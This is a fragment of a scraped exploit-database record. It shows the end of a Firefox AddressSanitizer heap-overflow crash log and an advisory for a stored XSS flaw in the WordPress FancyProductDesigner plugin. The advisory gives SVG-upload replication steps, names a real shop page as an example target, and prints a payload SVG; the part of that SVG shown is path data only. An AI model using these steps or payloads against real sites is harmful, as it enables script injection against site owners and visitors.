/home/worker/workspace/build/src/layout/generic/nsCanvasFrame.cpp:711:5\r\n \r\nSUMMARY: AddressSanitizer: heap-buffer-overflow /home/worker/workspace/build/src/gfx/thebes/gfxFont.h:785:46 in IsSimpleGlyph\r\nShadow bytes around the buggy address:\r\n 0x0c22800dc380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c22800dc390: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd\r\n 0x0c22800dc3a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x0c22800dc3b0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa\r\n 0x0c22800dc3c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n=>0x0c22800dc3d0: 00 00 00 00 00 00 00 00 00[04]fa fa fa fa fa fa\r\n 0x0c22800dc3e0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd\r\n 0x0c22800dc3f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x0c22800dc400: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa\r\n 0x0c22800dc410: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c22800dc420: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==104545==ABORTING\r\n-->\n\n# 0day.today [2018-02-20] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/27840"}, {"lastseen": "2018-02-15T21:19:38", "references": [], "description": "WordPress FancyProductDesigner plugin versions prior to 3.4.2 suffer from a persistent cross site scripting vulnerability due to improper sanitization, 
allowing malicious .svg file uploads.", "edition": 1, "reporter": "Project Insecurity", "published": "2017-05-03T00:00:00", "title": "WordPress FancyProductDesigner 3.4.2 Stored XSS Vulnerability", "type": "zdt", "enchantments": {"score": {"modified": "2018-02-15T21:19:38", "vector": "AV:N/AC:M/Au:M/C:N/I:P/A:P/", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-05-03T00:00:00", "id": "1337DAY-ID-27710", "href": "https://0day.today/exploit/description/27710", "sourceData": "[+]---------------------------------------------------------[+]\r\n | Vulnerable Software: FancyProductDesigner(WP plugin) |\r\n | Vendor: http://fancyproductdesigner.com |\r\n | Vulnerability Type: Stored XSS + FPD / File upload |\r\n | Date Released: 29/04/2017 |\r\n | Released by: 5tarboy (@insecurity) |\r\n [+]---------------------------------------------------------[+]\r\n\r\nFancy Product Designer is a paid WordPress plugin ($50 fee) that allows users to upload custom products of their choice\r\nto the site. The upload form claims that it only allows files of PNG and JPG format, but it is possible to upload SVG\r\nfiles also. There are an estimated 40,000-50,000 vulnerable sites. 
\r\n\r\nIn order to replicate this vulnerability you navigate to the product upload page and simply upload an .svg payload.\r\nHere is an example: https://www.saltsidecreations.com/product/ozark-20-oz/\r\nIt is possible to upload an .svg file via the image upload form - the file will be stored at http://[HOST]/wp-content/uploads/\r\n\r\nHere is an example SVG file that can be uploaded (resulting in persistent/stored XSS):\r\n------------------------------------------------------------------------------------------------------------\r\n\r\n<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\"?>\r\n<!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 20010904//EN\" \"http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/svg10.dtd\">\r\n<svg version=\"1.0\" xmlns=\"http://www.w3.org/2000/svg\" width=\"300.000000pt\" height=\"300.000000pt\" viewBox=\"0 0 300.000000 300.000000\" preserveAspectRatio=\"xMidYMid meet\">\r\n <metadata>\r\n twitter: @insecurity\r\n </metadata>\r\n <g transform=\"translate(0.000000,300.000000) scale(0.100000,-0.100000)\"\r\n fill=\"#000000\" stroke=\"none\">\r\n <path d=\"M128 2910 c-1 -49 -2 -100 -2 -112 -1 -19 4 -23 27 -23 15 0 27 3 27 8 0 4 0 54 0 112 l0 105 -25 0 c-25 0 -25 -1 -27 -90z m29 -27 c-3 -10 -5 -2 -5 17 0 19 2 27 5 18 2 -10 2 -26 0 -35z m0 -45 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z\"/>\r\n <path d=\"M290 2908 c0 -51 -3 -102 -6 -113 -5 -19 0 -20 85 -20 l91 0 0 113 c0 68 -4 112 -10 112 -10 0 -12 -9 -13 -72 0 -21 -4 -38 -9 -38 -4 0 -8 11 -8 24 0 44 -10 56 -38 49 -20 -5 -23 -3 -17 8 8 12 6 12 -8 1 -9 -8 -21 -11 -27 -7 -6 4 -10 3 -9 -2 1 -4 1 -21 0 -37 -2 -45 -12 -24 -14 28 -2 86 -17 46 -17 -46z m110 -21 l0 -62 -30 -1 -30 -2 0 64 0 64 30 0 30 0 0 -63z m30 -62 c-8 -9 -8 -15 0 -18 7 -4 7 -5 0 -3 -7 1 -11 5 -11 9 1 4 1 22 2 40 0 30 1 31 10 8 6 -16 6 -28 -1 -36z m-90 -16 c0 -5 -7 -9 -15 -9 -15 0 -20 12 -9 23 8 8 24 -1 24 -14z\"/>\r\n <path d=\"M600 2888 l0 -113 90 0 90 0 0 113 c0 93 -3 112 -15 112 -9 0 -15 -10 -15 -26 0 -20 -4 -25 -16 -20 
-9 3 -18 6 -20 6 -3 0 -3 3 0 8 2 4 -13 6 -35 4 -36 -4 -39 -7 -39 -33 0 -16 -4 -29 -9 -29 -5 0 -6 20 -3 45 4 37 2 45 -12 45 -14 0 -16 -15 -16 -112z m118 -2 c-3 -58 -4 -61 -29 -61 -15 -1 -34 -7 -43 -14 -14 -12 -16 -10 -15 15 0 25 2 26 9 9 7 -18 9 -18 15 -3 4 10 5 41 3 70 l-3 53 33 -3 33 -4 -3 -62z m32 -44 c0 -19 -5 -29 -15 -29 -11 0 -12 4 -5 11 5 5 10 18 10 28 0 10 2 18 5 18 3 0 5 -13 5 -28z\"/>\r\n <path d=\"M919 2900 c-1 -55 -2 -105 -3 -111 -1 -8 28 -12 87 -13 l87 -1 0 113 c0 92 -3 112 -15 112 -9 0 -12 -6 -8 -17 4 -11 3 -14 -5 -9 -8 5 -8 -1 0 -24 5 -17 8 -34 4 -37 -3 -4 -6 0 -6 9 0 22 -33 48 -62 48 -38 0 -52 -36 -44 -109 5 -42 4 -61 -4 -61 -7 0 -11 28 -10 83 2 112 1 117 -10 117 -6 0 -11 -41 -11 -100z m111 -14 l0 -65 -29 1 c-30 1 -30 1 -30 65 l0 63 30 0 29 0 0 -64z m34 -69 c-3 -9 -11 -14 -16 -11 -6 4 -5 10 3 15 11 7 11 9 1 9 -7 0 -10 5 -6 11 10 16 26 -5 18 -24z\"/>\r\n <path d=\"M1211 2894 l3 -107 -50 -24 c-146 -72 -347 -121 -530 -130 l-122 -6 -6 -45 c-18 -134 -2 -496 30 -687 19 -108 84 -310 119 -365 30 -48 31 -57 5 -65 -11 -3 -20 -13 -20 -21 0 -8 -4 -13 -9 -10 -14 9 -7 34 15 51 16 12 17 14 2 15 -9 0 -23 3 -32 6 -14 5 -16 -8 -16 -110 l0 -116 91 0 c90 0 91 0 85 23 -3 12 -6 25 -6 30 0 15 -20 7 -20 -9 0 -8 -4 -13 -9 -9 -5 3 -12 1 -16 -5 -3 -5 -12 -10 -18 -10 -7 0 -4 5 6 11 11 7 17 22 17 49 0 22 3 40 8 40 4 0 18 -17 32 -37 32 -46 101 -117 165 -168 27 -22 59 -48 69 -57 11 -10 28 -20 38 -24 18 -5 19 -15 16 -115 l-3 -109 33 0 32 0 0 54 c0 69 -10 117 -22 110 -10 -6 -28 12 -28 28 0 9 39 -8 107 -47 l53 -30 0 -57 0 -58 91 0 c68 0 90 3 86 13 -2 6 -13 11 -24 9 -11 -1 -26 4 -33 13 -7 8 -25 15 -41 15 -21 0 -29 5 -30 18 0 9 -3 12 -5 5 -3 -7 0 -21 6 -32 8 -17 8 -19 -4 -15 -19 7 -24 22 -21 67 2 32 -2 38 -27 49 -15 7 -28 16 -28 19 0 3 -18 12 -40 19 -22 7 -45 19 -51 27 -6 7 -18 13 -25 13 -8 0 -13 5 -12 12 2 7 -2 12 -9 13 -14 0 -43 24 -61 51 -7 10 -10 13 -7 7 8 -17 -1 -16 -31 4 -19 12 -22 18 -12 25 10 7 9 8 -3 6 -9 -2 -37 16 -62 40 -26 23 -44 42 -42 42 3 0 -3 9 -12 20 -10 11 -23 20 -31 
20 -7 0 -10 5 -6 12 4 7 3 8 -4 4 -7 -4 -12 -1 -12 8 0 9 -4 16 -8 16 -4 0 -16 14 -26 30 -9 17 -27 40 -39 52 -21 20 -21 21 -2 14 17 -5 18 -4 4 6 -19 15 -79 139 -79 162 0 9 -4 24 -9 34 -18 35 -30 68 -40 107 -14 53 -14 68 2 59 6 -4 4 1 -5 12 -9 11 -17 28 -17 39 0 11 -5 54 -11 95 -20 135 -23 183 -23 383 0 183 1 198 19 211 12 9 24 11 35 5 9 -4 18 -6 21 -4 3 3 34 7 69 9 82 6 187 24 212 37 10 6 28 9 38 6 13 -3 17 -1 12 6 -4 8 -1 7 9 -1 13 -10 17 -10 22 3 3 8 17 15 31 15 14 0 25 4 25 8 0 5 6 9 13 9 28 1 97 24 97 33 0 6 3 9 8 9 4 -1 10 0 15 1 10 3 25 7 35 9 4 0 19 12 34 26 15 14 42 28 60 32 18 3 44 17 58 30 13 13 29 23 34 23 5 0 16 7 25 15 9 8 29 27 46 42 16 16 35 27 43 25 9 -2 11 1 7 8 -11 18 34 2 58 -21 12 -10 29 -21 39 -25 10 -3 18 -11 18 -19 0 -7 9 -15 21 -18 13 -4 18 -10 13 -18 -4 -8 -3 -10 4 -5 7 4 12 3 12 -3 0 -6 6 -8 13 -6 17 7 80 -33 72 -45 -6 -10 7 -14 31 -11 6 1 17 -6 24 -14 7 -8 18 -15 26 -15 23 0 64 -23 58 -32 -3 -5 0 -8 7 -7 21 3 79 -13 79 -21 0 -5 10 -6 22 -2 15 4 19 2 13 -7 -5 -10 -2 -11 14 -6 12 4 21 2 21 -4 0 -6 7 -8 15 -5 8 4 22 1 30 -6 9 -7 18 -10 21 -7 3 3 20 1 37 -4 27 -8 129 -16 267 -22 33 -2 35 -4 39 -42 10 -88 4 -486 -8 -585 -7 -58 -13 -115 -13 -127 0 -13 -3 -21 -8 -18 -4 2 -5 -7 -2 -20 2 -15 0 -25 -7 -25 -7 0 -10 -4 -6 -10 6 -9 -39 -178 -51 -189 -4 -3 -3 5 0 19 6 21 5 22 -4 7 -6 -9 -8 -22 -5 -27 6 -11 -41 -117 -62 -138 -7 -7 -13 -18 -13 -23 0 -6 -4 -7 -10 -4 -6 4 -10 -5 -10 -20 0 -17 -7 -29 -22 -35 -13 -5 -19 -9 -14 -9 9 -1 -88 -101 -98 -101 -3 0 -28 -22 -55 -50 -27 -27 -56 -50 -64 -50 -8 0 -22 -11 -31 -25 -9 -14 -24 -25 -34 -25 -14 0 -14 -2 -3 -9 10 -6 27 -1 55 17 52 33 161 127 201 171 16 19 40 46 53 59 l22 25 -1 -39 c0 -21 -3 -34 -5 -27 -8 18 -34 4 -34 -18 0 -17 8 -19 88 -19 l87 0 -3 113 c-3 114 -3 114 -27 109 -15 -2 -22 -9 -18 -18 3 -8 9 -11 14 -8 5 3 9 -5 9 -17 0 -21 -1 -21 -20 -4 -19 17 -19 16 -17 -54 l2 -71 -31 0 c-31 0 -32 0 -29 46 2 28 11 55 23 68 62 69 142 314 168 516 18 136 25 536 11 630 l-8 55 -109 2 c-186 4 -350 41 -528 121 l-83 37 3 94 
c2 71 0 95 -10 99 -9 3 -13 -3 -12 -14 1 -11 1 -37 0 -59 l-3 -40 -6 35 c-4 20 -2 39 4 43 6 5 2 6 -9 3 -10 -4 -24 -2 -30 3 -6 5 -21 5 -33 0 -26 -10 -48 -45 -33 -54 5 -3 10 -10 10 -16 0 -5 -9 -4 -20 3 -12 8 -18 19 -14 28 3 8 7 23 9 33 2 9 7 22 10 27 3 6 -4 10 -16 10 -19 0 -21 -4 -16 -35 3 -19 3 -35 -1 -35 -3 0 -21 14 -39 32 l-33 32 -25 -24 c-54 -55 -65 -60 -65 -30 0 18 10 25 33 21 4 0 7 8 7 19 0 15 -7 20 -25 20 -23 0 -25 -3 -25 -48 0 -47 -2 -50 -47 -79 -74 -48 -125 -74 -130 -69 -11 11 7 35 22 30 13 -5 15 7 15 80 0 96 -17 118 -23 29 l-3 -58 -2 58 c-2 44 -5 57 -18 57 -13 0 -15 -15 -13 -106z m489 6 c0 -27 5 -50 10 -50 6 0 10 8 10 17 0 22 6 14 14 -20 6 -26 5 -27 -14 -17 -11 6 -20 9 -20 6 0 -3 -13 7 -29 22 -16 16 -31 41 -33 60 -4 31 -3 32 29 32 33 0 33 0 33 -50z m-990 -1459 c5 -11 10 -40 10 -65 0 -43 -2 -46 -27 -46 -14 0 -35 -7 -45 -17 -17 -15 -18 -15 -18 0 0 10 6 16 13 15 8 -2 13 17 15 65 3 58 5 67 22 67 11 0 24 -9 30 -19z m-78 -83 c-7 -7 -12 -8 -12 -2 0 14 12 26 19 19 2 -3 -1 -11 -7 -17z m1737 -49 c-16 -10 -23 -4 -14 10 3 6 11 8 17 5 6 -4 5 -9 -3 -15z m-1276 -289 c-3 -12 -8 -19 -11 -16 -5 6 5 36 12 36 2 0 2 -9 -1 -20z m-6 -52 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z\"/>\r\n <path d=\"M1872 2889 l3 -112 28 -3 27 -3 0 115 c0 97 -2 114 -16 114 -13 0 -15 -14 -12 -95 2 -52 0 -95 -4 -95 -5 0 -8 43 -8 95 0 59 -4 95 -10 95 -7 0 -10 -40 -8 -111z\"/>\r\n <path d=\"M2040 2888 l0 -113 30 0 30 0 0 113 c0 117 -16 156 -23 55 l-3 -58 -2 58 c-2 43 -6 57 -17 57 -12 0 -15 -19 -15 -112z m43 -28 c3 -11 1 -23 -4 -26 -5 -3 -9 6 -9 20 0 31 6 34 13 6z\"/>\r\n <path d=\"M2220 2888 l0 -113 85 2 c47 1 85 5 85 8 0 3 0 52 0 110 0 63 -4 105 -10 105 -5 0 -11 -17 -11 -37 l-2 -38 -7 40 c-5 30 -8 33 -9 13 0 -15 -6 -30 -12 -33 -6 -4 -9 -31 -8 -62 3 -55 2 -56 -27 -59 l-29 -3 2 62 c1 62 1 62 32 65 38 4 31 22 -8 22 -45 0 -55 -21 -48 -98 5 -51 4 -63 -5 -48 -7 12 -9 48 -5 98 5 65 4 78 -8 78 -12 0 -15 -20 -15 -112z m147 -70 c-2 -13 -4 -3 -4 22 0 25 2 35 4 23 2 -13 2 -33 0 -45z\"/>\r\n <path d=\"M2510 
2895 c0 -58 0 -108 0 -112 0 -4 12 -7 28 -7 27 0 27 0 25 65 -1 35 -2 85 -2 112 -1 46 -15 64 -24 30 -4 -17 -5 -17 -6 0 0 9 -5 17 -11 17 -6 0 -10 -42 -10 -105z m27 -67 c-3 -7 -5 -2 -5 12 0 14 2 19 5 13 2 -7 2 -19 0 -25z\"/>\r\n <path d=\"M2690 2901 c0 -55 -2 -105 -5 -113 -4 -10 14 -13 85 -13 l90 0 0 113 c0 68 -4 112 -10 112 -9 0 -11 -9 -15 -62 -1 -26 -15 -34 -15 -10 0 29 -45 59 -64 43 -16 -14 -46 -4 -46 15 0 8 -4 14 -10 14 -6 0 -10 -40 -10 -99z m112 -16 c-4 -64 -4 -65 -30 -62 -26 3 -27 7 -30 65 l-2 62 32 0 33 0 -3 -65z m-85 3 c-2 -13 -4 -5 -4 17 -1 22 1 32 4 23 2 -10 2 -28 0 -40z m119 -57 c-4 -6 -13 -11 -19 -10 -9 0 -9 2 0 5 7 3 9 13 6 22 -5 13 -3 14 7 5 7 -6 9 -16 6 -22z m-112 4 c3 -8 1 -15 -4 -15 -6 0 -10 7 -10 15 0 8 2 15 4 15 2 0 6 -7 10 -15z m99 -32 c-7 -2 -19 -2 -25 0 -7 3 -2 5 12 5 14 0 19 -2 13 -5z\"/>\r\n <path d=\"M1490 2762 c-8 -3 -19 -11 -23 -19 -5 -7 -14 -10 -20 -7 -7 4 -9 4 -5 -1 11 -12 -40 -48 -58 -41 -10 4 -14 1 -11 -6 5 -16 -89 -70 -121 -70 -12 0 -25 -5 -29 -11 -4 -6 -1 -7 7 -2 8 5 11 4 6 -3 -3 -6 -20 -13 -36 -17 -16 -4 -32 -11 -35 -16 -4 -5 -22 -9 -41 -9 -19 0 -33 -4 -30 -9 4 -5 -13 -12 -36 -16 -24 -4 -69 -13 -100 -21 -32 -8 -96 -16 -143 -17 -116 -4 -114 -1 -115 -202 0 -161 15 -346 30 -376 5 -9 6 -27 3 -39 -3 -13 -2 -21 3 -18 5 4 10 -11 12 -33 1 -21 11 -58 21 -81 10 -24 16 -49 14 -55 -3 -7 1 -13 7 -13 7 0 9 -9 5 -22 -5 -18 -4 -20 4 -8 9 13 11 13 11 0 0 -20 33 -84 53 -105 9 -8 14 -22 10 -30 -4 -11 0 -14 13 -9 11 4 16 4 13 0 -6 -6 44 -69 88 -110 52 -49 88 -81 93 -81 17 -1 52 -36 47 -48 -4 -10 1 -13 19 -9 14 2 32 -2 42 -11 9 -8 27 -18 40 -22 12 -3 20 -11 16 -16 -3 -5 -2 -8 3 -7 14 4 94 -32 89 -40 -3 -5 8 -7 25 -6 21 1 29 -2 29 -14 0 -14 2 -14 9 -3 7 11 12 10 28 -6 11 -11 31 -18 48 -17 17 1 35 -3 42 -8 8 -7 18 -5 28 6 9 9 22 16 28 16 7 0 29 9 50 20 43 23 51 25 41 8 -4 -7 2 -4 13 8 11 11 41 28 67 38 27 10 43 22 40 28 -4 6 -2 8 3 5 12 -7 139 74 160 101 7 9 13 14 13 10 0 -11 81 75 125 132 22 29 48 61 57 71 9 9 14 20 11 23 -3 2 5 15 16 27 12 13 19 29 17 35 
-2 6 2 21 9 31 8 11 22 48 31 81 9 34 21 59 26 56 4 -3 8 -1 8 5 0 5 -4 12 -8 15 -4 3 -6 21 -4 42 3 21 8 31 12 24 18 -30 28 199 20 493 -2 82 -5 100 -21 111 -10 7 -17 15 -14 18 7 7 -27 7 -45 0 -25 -9 -50 -10 -50 0 0 5 -21 8 -47 7 -27 -1 -61 1 -78 4 -92 14 -114 20 -108 30 3 5 1 7 -5 3 -6 -3 -23 -1 -39 6 -15 6 -31 12 -35 13 -5 2 -10 4 -13 5 -7 3 -22 7 -36 9 -5 0 -8 5 -5 10 3 5 -1 12 -10 15 -8 3 -12 2 -9 -4 10 -16 -11 -12 -25 4 -6 8 -19 12 -27 9 -11 -4 -14 -2 -9 5 6 11 2 13 -19 12 -3 -1 -12 5 -20 12 -32 29 -45 39 -45 33 0 -3 -14 7 -31 22 -45 41 -82 61 -99 55z m141 -115 c50 -32 134 -74 211 -105 73 -30 209 -54 304 -56 l102 -1 6 -73 c24 -262 -17 -595 -94 -767 -58 -129 -174 -257 -315 -350 -98 -64 -122 -76 -242 -125 l-95 -38 -68 23 c-117 40 -244 107 -345 184 -217 165 -325 375 -354 691 -19 214 -21 245 -14 341 l6 96 106 6 c151 9 294 48 433 118 77 39 188 111 213 139 l19 21 35 -34 c20 -19 61 -50 92 -70z\"/>\r\n <path d=\"M1330 2441 c-104 -26 -140 -41 -140 -57 0 -19 20 -18 89 6 91 30 227 44 316 30 77 -12 98 -9 89 14 -6 16 -3 15 -154 21 -100 3 -140 1 -200 -14z\"/>\r\n <path d=\"M1737 2413 c-9 -14 5 -27 44 -41 46 -16 59 -15 59 3 0 22 -92 55 -103 38z\"/>\r\n <path d=\"M1377 2373 c-20 -3 -27 -9 -25 -21 2 -11 11 -16 23 -13 11 2 70 3 130 4 154 1 256 -32 368 -117 48 -37 77 -46 77 -24 0 37 -159 128 -276 158 -73 19 -216 25 -297 13z\"/>\r\n <path d=\"M1200 2310 c-74 -39 -180 -122 -180 -141 0 -25 33 -19 63 11 40 41 137 105 183 120 23 8 34 17 32 28 -5 26 -20 23 -98 -18z\"/>\r\n <path d=\"M1438 2298 c-37 -3 -85 -12 -105 -19 -180 -58 -321 -211 -340 -368 -5 -47 -4 -51 14 -51 17 0 22 9 28 47 11 73 57 163 111 216 97 97 200 138 349 142 77 2 100 6 100 16 0 18 -70 26 -157 17z\"/>\r\n <path d=\"M1647 2273 c-14 -13 -6 -22 31 -33 20 -7 57 -23 81 -37 39 -23 45 -24 59 -9 14 14 9 18 -59 51 -72 35 -99 41 -112 28z\"/>\r\n <path d=\"M990 2235 c0 -8 5 -15 10 -15 6 0 10 7 10 15 0 8 -4 15 -10 15 -5 0 -10 -7 -10 -15z\"/>\r\n <path d=\"M1467 2224 c-21 -21 -3 -32 66 -36 126 -9 221 -58 292 -150 44 -58 65 -124 65 
-208 0 -65 2 -70 21 -70 21 0 21 4 17 93 -3 81 -8 99 -38 155 -50 94 -142 167 -250 200 -47 14 -164 25 -173 16z\"/>\r\n <path d=\"M1322 2188 c-41 -17 -72 -36 -72 -44 0 -20 14 -18 89 12 78 31 86 37 69 52 -10 8 -32 3 -86 -20z\"/>\r\n <path d=\"M1853 2154 c-3 -10 7 -29 29 -52 19 -20 44 -56 54 -79 20 -45 33 -56 53 -43 16 10 -12 66 -69 138 -43 55 -57 62 -67 36z\"/>\r\n <path d=\"M772 2135 c0 -16 2 -22 5 -12 2 9 2 23 0 30 -3 6 -5 -1 -5 -18z\"/>\r\n <path d=\"M1410 2136 c-69 -19 -111 -44 -159 -94 -52 -54 -80 -113 -81 -164 0 -31 4 -38 20 -38 14 0 20 7 20 23 0 109 106 219 233 242 27 5 37 12 35 23 -4 21 -15 22 -68 8z\"/>\r\n <path d=\"M1543 2143 c-27 -9 -12 -32 25 -38 20 -4 47 -10 60 -16 17 -7 24 -5 29 6 3 9 3 18 0 21 -9 9 -102 31 -114 27z\"/>\r\n <path d=\"M1173 2088 c-58 -61 -86 -132 -93 -234 -4 -81 -8 -94 -29 -111 -14 -11 -21 -25 -17 -31 11 -19 31 -14 57 14 21 22 25 39 30 118 6 102 29 162 82 216 17 18 27 36 23 45 -8 22 -19 19 -53 -17z\"/>\r\n <path d=\"M1695 2070 c-3 -5 11 -26 31 -46 63 -64 76 -108 73 -242 -3 -101 -1 -117 12 -120 25 -5 29 18 26 151 -2 135 -10 158 -76 230 -35 37 -55 45 -66 27z\"/>\r\n <path d=\"M1445 2063 c-38 -8 -90 -36 -118 -62 -49 -45 -67 -92 -67 -176 0 -90 -22 -141 -81 -194 -39 -33 -52 -71 -25 -71 23 0 124 117 135 158 6 20 11 66 11 101 0 112 41 170 144 205 61 21 131 9 189 -31 59 -41 77 -86 77 -191 0 -156 -47 -280 -151 -395 -49 -54 -57 -68 -44 -73 19 -8 70 37 124 111 78 106 111 209 111 349 0 116 -16 162 -72 212 -56 50 -155 75 -233 57z\"/>\r\n <path d=\"M1424 1970 c-55 -28 -72 -65 -77 -170 -4 -102 -23 -143 -96 -215 -49 -48 -66 -85 -37 -85 19 0 122 113 147 162 15 30 23 70 28 141 6 95 8 100 36 123 23 18 42 24 83 24 46 0 58 -4 83 -29 28 -28 29 -33 29 -119 0 -158 -53 -275 -179 -396 -34 -31 -61 -62 -61 -67 0 -28 45 0 112 69 134 138 162 205 163 384 0 110 -1 118 -25 143 -52 57 -134 70 -206 35z\"/>\r\n <path d=\"M1459 1897 c-13 -10 -18 -34 -20 -102 -5 -119 -33 -176 -133 -275 -41 -40 -73 -77 -70 -82 13 -20 40 -3 110 67 96 96 124 156 133 280 5 81 8 90 26 90 18 0 20 
-8 23 -64 6 -136 -30 -222 -145 -340 -45 -47 -80 -89 -77 -93 11 -18 33 -4 107 70 111 110 148 187 155 323 4 86 2 102 -13 119 -21 23 -71 26 -96 7z\"/>\r\n <path d=\"M1170 1771 c0 -22 -12 -41 -45 -73 -44 -42 -58 -78 -31 -78 18 0 94 83 106 116 16 41 12 64 -10 64 -15 0 -20 -7 -20 -29z\"/>\r\n <path d=\"M1774 1603 c-3 -10 -12 -33 -20 -52 -16 -35 -8 -56 17 -46 16 6 51 94 43 107 -9 14 -34 8 -40 -9z\"/>\r\n <path d=\"M1595 1330 c-3 -5 -1 -10 4 -10 6 0 11 5 11 10 0 6 -2 10 -4 10 -3 0 -8 -4 -11 -10z\"/>\r\n <path d=\"M124 2497 l1 -112 87 -2 88 -2 0 115 0 114 -88 0 -88 0 0 -113z m149 68 c-7 -21 -13 -19 -13 6 0 11 4 18 10 14 5 -3 7 -12 3 -20z m-101 3 c-5 -7\r\n -12 -22 -15 -33 -3 -13 -5 -9 -6 13 -1 23 3 32 15 32 12 0 14 -3 6 -12z m70 -59 c-3 -42 0 -75 6 -81 14 -14 26 30 20 72 -2 16 -1 27 4 24 9 -6 11 -75 2 -98 -3 -9 -15 -16 -26 -16 -10 0 -16 5 -13 10 4 6 -7 10 -24 10 l-31 0 0 65 0 65 30 0 c17 0 30 5 30 10 0 6 1 10 3 10 1 0 1 -32 -1 -71z m-58 -92 c7 -5 3 -7 -9 -5 -13 2 -21 12 -23 28 -2 24 -2 24 9 5 7 -11 17 -24 23 -28z\"/>\r\n <path d=\"M420 2497 l0 -114 30 -1 30 -1 0 115 0 114 -30 0 -30 0 0 -113z m31 -24 c2 -23 0 -45 -4 -49 -4 -4 -7 17 -7 46 0 62 7 64 11 3z\"/>\r\n <path d=\"M2527 2498 l2 -112 86 -3 85 -3 0 115 0 115 -87 0 -88 0 2 -112z m73 88 c0 -3 -4 -8 -10 -11 -5 -3 -10 -1 -10 4 0 6 5 11 10 11 6 0 10 -2 10 -4z m-30 -15 c0 -6 -4 -12 -8 -15 -5 -3 -9 1 -9 9 0 8 4 15 9 15 4 0 8 -4 8 -9z m108 -18 c2 -12 -1 -30 -7 -40 -8 -14 -9 -8 -4 21 4 27 3 37 -5 32 -6 -3 -14 -1 -17 5 -5 7 0 10 11 7 11 -2 20 -13 22 -25z m-38 -58 l0 -65 -30 0 -30 0 1 65 c2 65 2 65 30 65 29 0 29 0 29 -65z m35 -66 c-4 -11 -15 -19 -26 -19 -11 0 -17 5 -14 10 3 6 13 10 20 10 11 0 13 9 9 33 -4 29 -4 30 6 8 6 -13 8 -32 5 -42z m-106 -7 c1 -7 -3 -10 -9 -7 -5 3 -10 18 -9 33 0 24 1 25 9 7 5 -11 9 -26 9 -33z\"/>\r\n <path d=\"M2800 2495 l0 -115 30 0 30 0 0 115 0 115 -30 0 -30 0 0 -115z m40 -31 c0 -34 -4 -53 -10 -49 -5 3 -10 28 -10 56 0 27 5 49 10 49 6 0 10 -25 10 -56z\"/>\r\n <path d=\"M123 2140 l-1 -110 29 0 29 0 0 94 c0 52 
3 101 6 110 5 13 -1 16 -27 16 l-34 0 -2 -110z\"/>\r\n <path d=\"M285 2140 l0 -110 88 0 87 0 0 110 0 110 -87 0 -88 0 0 -110z m147 68 c-2 -10 -6 -18 -8 -18 -2 0 -8 8 -13 18 -7 14 -6 18 8 18 12 0 17 -6 13 -18z m-32 -71 l0 -64 -30 5 c-29 4 -30 5 -30 63 0 59 0 59 30 59 l30 0 0 -63z m37 -27 c4 -48 3 -59 -8 -55 -10 4 -13 21 -11 66 5 74 13 70 19 -11z m-114 -4 c2 -16 12 -35 23 -43 18 -14 18 -14 -6 -11 -27 3 -39 28 -32 66 6 28 10 25 15 -12z\"/>\r\n <path d=\"M2510 2140 l0 -110 28 0 27 0 0 110 0 110 -27 0 -28 0 0 -110z m27 -42 c-2 -13 -4 -5 -4 17 -1 22 1 32 4 23 2 -10 2 -28 0 -40z\"/>\r\n <path d=\"M2685 2140 l0 -110 88 0 87 0 0 110 0 110 -87 0 -88 0 0 -110z m135 73 c0 -14 -2 -15 -9 -4 -6 10 -20 12 -45 8 -20 -3 -36 -2 -36 2 0 4 20 8 45 10 38 2 45 -1 45 -16z m-20 -73 c0 -60 0 -60 -30 -60 -30 0 -30 0 -30 60 0 60 0 60 30 60 30 0 30 0 30 -60z m40 44 c0 -8 -5 -12 -10 -9 -6 4 -8 11 -5 16 9 14 15 11 15 -7z m-104 -119 c13 -9 12 -11 -5 -11 -19 0 -21 6 -19 56 1 53 2 53 5 11 3 -25 11 -50 19 -56z m91 73 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z m13 -43 c0 -25 -32 -50 -53 -41 -7 2 -4 5 6 5 11 1 20 12 24 31 7 36 23 40 23 5z\"/>\r\n <path d=\"M124 1750 l1 -110 88 0 87 0 0 110 0 110 -88 0 -89 0 1 -110z m37 53 c-9 -16 -10 -14 -11 12 0 21 3 26 11 18 8 -8 8 -16 0 -30z m93 21 c5 -14 4 -15 -9 -4 -17 14 -19 20 -6 20 5 0 12 -7 15 -16z m-14 -77 c0 -62 0 -63 -27 -61 -27 1 -28 3 -31 62 l-3 62 31 0 30 0 0 -63z m37 11 c-2 -13 -4 -5 -4 17 -1 22 1 32 4 23 2 -10 2 -28 0 -40z m-13 -85 c-17 -17 -18 -17 -11 0 4 10 7 24 7 30 0 8 3 8 11 0 9 -9 7 -16 -7 -30z m-94 2 c10 -12 10 -15 -4 -15 -9 0 -16 7 -16 15 0 8 2 15 4 15 2 0 9 -7 16 -15z\"/>\r\n <path d=\"M420 1750 l0 -110 30 